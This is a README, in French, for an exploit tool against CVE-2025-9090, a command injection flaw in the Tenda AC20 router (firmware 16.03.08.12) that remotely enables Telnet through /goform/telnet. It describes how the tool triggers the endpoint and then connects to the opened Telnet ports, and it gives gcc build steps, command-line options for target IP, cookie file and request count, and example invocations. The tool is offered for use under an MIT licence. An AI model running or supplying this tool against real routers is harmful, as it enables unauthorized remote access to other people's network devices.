
Injection de commande dans Tenda AC20 16.03.08.12 (/goform/telnet)
Auteur : Byte Reaper
Cet exploit cible CVE-2025-9090, une vulnérabilité d'injection de commande dans le routeur Tenda AC20 (v16.03.08.12).
La faille se trouve sur le point de terminaison /goform/telnet, qui peut être déclenché à distance.
Lorsqu'il est accédé, il démarre le service Telnet sur l'appareil, ouvrant les ports 23/2323 pour une interaction à distance.
Le programme envoie une requête au point de terminaison vulnérable, cherche la chaîne de réponse "load telnetd success", puis tente de se connecter au service Telnet pour confirmer le succès de l'exploitation.
Compilez avec gcc :
gcc exploit.c argparse.c -o CVE-2025-9090 -lcurl
-h, --help show this help message and exit
-i, --ip Enter Target IP
-c, --cookies Enter File cookies
-v, --verbose Verbose Mode
-f, --loop= Number request
./CVE-2025-9090 -i <IP>
- verbose mode :
./CVE-2025-9090 -i <IP> -v
- number request :
./CVE-2025-9090 -i <IP> -v -f 5 (5 POST endpoint)
- cookies file :
./CVE-2025-9090 -i <IP> -v -f 5 -c [file name]
MIT